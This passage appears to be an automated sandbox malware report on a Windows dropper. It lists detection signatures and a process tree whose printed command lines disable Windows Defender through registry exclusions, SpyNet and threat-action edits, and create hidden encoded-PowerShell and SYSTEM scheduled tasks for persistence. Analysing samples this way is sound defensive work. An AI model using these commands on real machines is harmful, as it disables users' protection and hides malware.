Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Performs DNS queries to domains with low reputation
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- file.exe (PID: 5428 cmdline:
C:\Users\u ser\Deskto p\file.exe MD5: E99E15A440798E20C682EB859B3F7885) - Install.exe (PID: 2620 cmdline:
.\Install. exe MD5: 65D01849A2062434BCE6C580CDA92A1D) - Install.exe (PID: 3408 cmdline:
.\Install. exe /S /si te_id "525 403" MD5: 893793FBD70BA4A92919D09205D6C9C1) - forfiles.exe (PID: 5112 cmdline:
C:\Windows \System32\ forfiles.e xe" /p c:\ windows\sy stem32 /m cmd.exe /c "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions \" /f /v \ "exe\" /t REG_SZ /d 0 /reg:32& REG ADD \" HKLM\SOFTW ARE\Polici es\Microso ft\Windows Defender\ Exclusions \Extension s\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8) - conhost.exe (PID: 5648 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 5704 cmdline:
/C REG ADD "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Exclusio ns\Extensi ons" /f /v "exe" /t REG_SZ /d 0 /reg:32& REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D) - reg.exe (PID: 5752 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2) - reg.exe (PID: 4644 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2) - forfiles.exe (PID: 5640 cmdline:
C:\Windows \System32\ forfiles.e xe" /p c:\ windows\sy stem32 /m cmd.exe /c "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet\" /f /v \"SpyN etReportin g\" /t REG _DWORD /d 0 /reg:32& REG ADD \" HKLM\SOFTW ARE\Polici es\Microso ft\Windows Defender\ Spynet\" / f /v \"Spy NetReporti ng\" /t RE G_DWORD /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8) - conhost.exe (PID: 5624 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 5696 cmdline:
/C REG ADD "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Spynet" /f /v "Spy NetReporti ng" /t REG _DWORD /d 0 /reg:32& REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D) - reg.exe (PID: 3128 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2) - Conhost.exe (PID: 5828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - reg.exe (PID: 1412 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2) - schtasks.exe (PID: 5792 cmdline:
schtasks / CREATE /TN "gbyyEslR l" /SC onc e /ST 15:1 3:59 /F /R U "user" / TR "powers hell -Wind owStyle Hi dden -Enco dedCommand cwB0AGEAc gB0AC0AcAB yAG8AYwBlA HMAcwAgAC0 AVwBpAG4AZ ABvAHcAUwB 0AHkAbABlA CAASABpAGQ AZABlAG4AI ABnAHAAdQB wAGQAYQB0A GUALgBlAHg AZQAgAC8AZ gBvAHIAYwB lAA==" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 5804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 5992 cmdline:
schtasks / run /I /tn "gbyyEslR l" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 6040 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 2068 cmdline:
schtasks / DELETE /F /TN "gbyyE slRl" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 4092 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 1920 cmdline:
schtasks / CREATE /TN "bbsSMGQQ DZvgelOgpL " /SC once /ST 19:16 :00 /RU "S YSTEM" /TR "\"C:\Use rs\user\Ap pData\Loca l\Temp\VXA fcxyYiTQKM OERw\efplS HrLkKviaSK \pdyDoIJ.e xe\" DC /s ite_id 525 403 /S" /V 1 /F MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 2072 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 6060 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.EXE -W indowStyle Hidden -E ncodedComm and cwB0AG EAcgB0AC0A cAByAG8AYw BlAHMAcwAg AC0AVwBpAG 4AZABvAHcA UwB0AHkAbA BlACAASABp AGQAZABlAG 4AIABnAHAA dQBwAGQAYQ B0AGUALgBl AHgAZQAgAC 8AZgBvAHIA YwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 408 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - gpupdate.exe (PID: 2108 cmdline:
"C:\Window s\system32 \gpupdate. exe" /forc e MD5: 47C68FE26B0188CDD80F744F7405FF26) - conhost.exe (PID: 2356 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- gpscript.exe (PID: 5816 cmdline:
gpscript.e xe /Refres hSystemPar am MD5: C48CBDC676E442BAF58920C5B7E556DE)
- pdyDoIJ.exe (PID: 2384 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\VXAfcxy YiTQKMOERw \efplSHrLk KviaSK\pdy DoIJ.exe D C /site_id 525403 /S MD5: 893793FBD70BA4A92919D09205D6C9C1) - powershell.exe (PID: 3560 cmdline:
powershell "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 25451\" /t REG_SZ /d 6 /reg:32 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "225451\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"256596\ " /t REG_S Z /d 6 /re g:32;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"25659 6\" /t REG _SZ /d 6 / reg:64;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"242 872\" /t R EG_SZ /d 6 /reg:32;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 42872\" /t REG_SZ /d 6 /reg:64 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214774937 3\" /t REG _SZ /d 6 / reg:32;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7749373\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"2147807 942\" /t R EG_SZ /d 6 /reg:32;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 147807942\ " /t REG_S Z /d 6 /re g:64;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"21477 35735\" /t REG_SZ /d 6 /reg:32 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214773573 5\" /t REG _SZ /d 6 / reg:64;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7737010\" /t REG_SZ /d 6 /reg: 32;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"2147737 010\" /t R EG_SZ /d 6 /reg:64;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 147737007\ " /t REG_S Z /d 6 /re g:32;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"21477 37007\" /t REG_SZ /d 6 /reg:64 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214773750 3\" /t REG _SZ /d 6 / reg:32;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7737503\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol